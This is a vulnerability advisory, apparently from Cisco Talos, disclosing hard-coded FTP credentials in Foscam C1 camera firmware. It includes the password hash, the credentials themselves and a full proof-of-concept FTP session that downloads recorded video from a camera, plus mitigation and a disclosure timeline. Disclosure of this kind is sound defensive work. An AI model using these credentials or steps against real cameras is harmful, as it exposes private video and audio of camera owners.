### Summary Hard-coded FTP credentials (r:r) are included in the Foscam C1 running firmware 1.9.1.12. Knowledge of these credentials would allow remote access to any cameras found on the internet that do not have port 50021 blocked by an intermediate device. ### Tested Versions Foscam C1 Firmware Version 1.9.1.12 ### Product URLs Foscam ### CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-259: Use of Hard-coded Password ### Details The file found at '/mtd/app/bin/ftpd/pureftpd.passwd' contains the following hash: ``` r:$1$whR6Mhk0$FR1VT/mX5D/qwRsgCkHLO.:1001:1001::/mnt/sd/./:::::::::::: ``` This hash resolves to a simple user/pass combo of 'r:r'. The user/pass of r:r permits anyone to log into a Foscam camera and have full read/write to the mounted Micro-SD card, which contains .avi videos and .jpg snapshots. If the camera has a microphone, the .avi videos will have audio recording as well. An attacker armed with this knowledge can connect remotely to the...
### Summary Hard-coded FTP credentials (r:r) are included in the Foscam C1 running firmware 1.9.1.12. Knowledge of these credentials would allow remote access to any cameras found on the internet that do not have port 50021 blocked by an intermediate device. ### Tested Versions Foscam C1 Firmware Version 1.9.1.12 ### Product URLs Foscam ### CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-259: Use of Hard-coded Password ### Details The file found at '/mtd/app/bin/ftpd/pureftpd.passwd' contains the following hash: ``` r:$1$whR6Mhk0$FR1VT/mX5D/qwRsgCkHLO.:1001:1001::/mnt/sd/./:::::::::::: ``` This hash resolves to a simple user/pass combo of 'r:r'. The user/pass of r:r permits anyone to log into a Foscam camera and have full read/write to the mounted Micro-SD card, which contains .avi videos and .jpg snapshots. If the camera has a microphone, the .avi videos will have audio recording as well. An attacker armed with this knowledge can connect remotely to the target camera and dump potentially sensitive data. ### Exploit Proof-of-Concept ``` $ ftp 192.168.1.19 50021 Connected to 192.168.1.19 (192.168.1.19). 220---------- Welcome to Pure-FTPd [privsep] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 19:04. Server port: 50021. 220-This is a private system - No anonymous login 220 You will be disconnected after 15 minutes of inactivity. Name (192.168.1.19:user): r 331 User r OK. Password required Password: 230 OK. Current directory is / Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 227 Entering Passive Mode (192,168,1,19,80,232) 150 Accepted data connection drwxrwxrwx 3 0 0 32768 Sep 28 13:12 IPCamera 226-Options: -l 226 1 matches total ftp> cd IPCamera 250 OK. Current directory is /IPCamera ftp> ls 227 Entering Passive Mode (192,168,1,19,200,199) 150 Accepted data connection drwxrwxrwx 4 0 0 32768 Jan 1 2010 C1_000000001 226-Options: -l 226 1 matches total ftp> cd C1_000000001 250 OK. Current directory is /IPCamera/C1_000000001 ftp> ls 227 Entering Passive Mode (192,168,1,19,112,123) 150 Accepted data connection drwxrwxrwx 48 0 0 32768 Nov 13 15:57 record drwxrwxrwx 48 0 0 32768 Nov 13 15:57 snap 226-Options: -l 226 2 matches total ftp> cd record 250 OK. Current directory is /IPCamera/C1_000000001/record ftp> ls 227 Entering Passive Mode (192,168,1,19,54,239) 150 Accepted data connection drwxrwxrwx 3 0 0 32768 Nov 1 16:54 20161101 drwxrwxrwx 3 0 0 32768 Nov 5 01:29 20161104 drwxrwxrwx 3 0 0 32768 Nov 5 19:32 20161105 drwxrwxrwx 3 0 0 32768 Nov 7 16:32 20161107 drwxrwxrwx 3 0 0 32768 Nov 8 20:04 20161108 drwxrwxrwx 3 0 0 32768 Nov 10 02:05 20161109 drwxrwxrwx 3 0 0 32768 Nov 13 15:57 20161113 226-Options: -l 226 46 matches total ftp> cd 20161104 250 OK. Current directory is /IPCamera/C1_000000001/record/20161104 ftp> ls 227 Entering Passive Mode (192,168,1,19,69,159) 150 Accepted data connection drwxrwxrwx 2 0 0 32768 Nov 5 01:34 20161104_202945 226-Options: -l 226 1 matches total ftp> cd 20161104_202945 250 OK. Current directory is /IPCamera/C1_000000001/record/20161104/20161104_202945 ftp> ls 227 Entering Passive Mode (192,168,1,19,248,107) 150 Accepted data connection -rwxrwxrwx 1 0 0 12618644 Nov 5 01:34 SDalarm_20161104_202945.avi -rwxrwxrwx 1 0 0 320000 Nov 5 01:34 index.dat 226-Options: -l 226 2 matches total ftp> get SDalarm_20161104_202945.avi local: SDalarm_20161104_202945.avi remote: SDalarm_20161104_202945.avi 227 Entering Passive Mode (192,168,1,19,243,42) 150-Accepted data connection 150 12322.9 kbytes to download quit 226-File successfully transferred 226 30.430 seconds (measured here), 404.96 Kbytes per second 12618644 bytes received in 30.4 secs (414.43 Kbytes/sec) ftp> quit 221-Goodbye. You uploaded 0 and downloaded 12323 kbytes. 221 Logout. $ exit exit ``` ### Mitigation Exploitation relies on the availability of port 50021 (the default FTP port that this camera uses). Preventing access to this port or disabling FTP completely will help mitigate this vulnerability. ### Timeline * 2016-11-29 - Vendor disclosure * 2017-06-19 - Public release ### CREDIT * Discovered by Richard Harman and Dave McDaniel of Cisco Talos
